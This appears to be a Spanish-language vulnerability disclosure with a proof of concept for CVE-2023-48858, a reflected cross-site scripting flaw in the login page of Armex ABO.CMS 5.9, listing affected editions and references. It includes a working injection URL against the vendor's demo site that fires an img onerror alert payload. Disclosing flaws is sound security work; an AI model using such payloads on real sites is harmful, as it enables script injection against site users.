
Prueba de concepto de exploit para CVE-2023-48858, una vulnerabilidad de XSS reflejado en la página de inicio de sesión de Armex ABO.CMS 5.9, que demuestra la inyección de scripts web arbitrarios mediante una URL manipulada.
PoC para CVE-2023-48858
Una vulnerabilidad de Cross-site scripting (XSS) en el código PHP de la página de inicio de sesión en
Armex ABO.CMS 5.9 permite a atacantes remotos inyectar script web arbitrario
o HTML a través de la parte de URL login.php?.
Prueba de concepto:
http://demo.abocms.ru/login.php/eqbzm%22%3E%3Cimg%20src%3d/%20onerror%3dalert%281%29%3Er338y

No es específicamente una vulnerabilidad de la versión "demo", fue confirmada
en la naturaleza en un sitio web real expuesto a la red
El enlace a la demo utilizada aquí es solo para mostrar que esta vulnerabilidad persiste
Tipo de vulnerabilidad:
Cross Site Scripting (XSS)
Proveedor del producto:
Armex Programming Products (INN 7722635725)
Productos (presumiblemente) afectados:
ABO.CMS: Start - 5.9
ABO.CMS: Promo - 5.9
ABO.CMS: Corporative - 5.9
ABO.CMS: Shop - 5.9
ABO.CMS: Business - 5.9
ABO.CMS: Bank - 5.9
El problema se encontró en la página login.php, por lo que todas las versiones que la utilizan (función de inicio de sesión) deberían estar afectadas. Además, personalmente no creo que nada cambie para corregir esta vulnerabilidad en las próximas versiones de ABO.CMS
Referencia:
https://abocms.ru/about/versions/version59/
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-48858